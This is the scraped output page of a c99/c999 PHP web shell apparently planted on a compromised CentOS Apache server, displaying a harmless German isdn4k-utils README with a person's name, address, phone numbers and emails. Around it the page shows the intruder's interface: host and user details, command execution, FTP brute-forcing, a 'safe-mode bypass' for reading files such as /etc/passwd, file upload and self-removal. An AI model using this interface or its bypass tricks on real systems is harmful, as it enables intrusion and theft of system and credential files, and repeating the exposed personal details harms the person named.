!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/isdn4k-utils-3.2/_howto/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     www-vbox.txt (945 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Da auf meinen Arbeitsplatzrechner i.d.R. kein LinuX laeuft, habe ich zwei
CGI-Skripte (Perl) (+2 weitere Shellscripte) gebastelt, die einem den
Zugriff auf seine eigenen Anrufe per WWW-Browser ermoeglichen. Die Perlscripte gehoeren ins CGI-Verzeichnis
(des Users), die anderen  beiden koennen irgendwo liegen. Die Scripte greifen
auf die Umgebungsvariable $REMOTE_USER des http-Servers zu. Es ist also
notwendig, dass sich der User gegenueber dem Server authentifiziert !
Weiterhin muessen die Scripte mit User-Rechten laufen. Der aktuelle
Apache 1.2b4 sollte das zwar koennen. Da das ihm beiliegende "suexec" jedoch
bei mir nicht richtig lief, habe ich es etwas geaendert (habe ich auch
beigelegt).

Gruss
                Marc 
____________________________________________________________________
Marc Neitzner	| marc@zeus.han.de 		| Tel.: 0511-2714507
Alte Ziegelei 7	| neitzner@rvs.uni-hannover.de	| Fax : 0511-2714537
30419 Hannover	|				|


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0137 ]--